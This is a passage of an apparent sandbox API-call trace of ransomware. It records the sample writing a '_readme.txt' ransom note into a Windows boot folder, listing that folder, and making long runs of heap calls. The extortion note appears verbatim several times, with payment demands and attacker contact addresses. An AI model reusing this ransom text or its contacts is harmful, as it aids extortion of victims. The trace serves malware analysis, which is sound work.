payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.973] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.974] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.974] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.975] CloseHandle (hObject=0x5cc) returned 1 [0090.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.975] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.976] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.976] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.976] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a3340, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.976] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a3340, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.976] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.976] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.976] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | 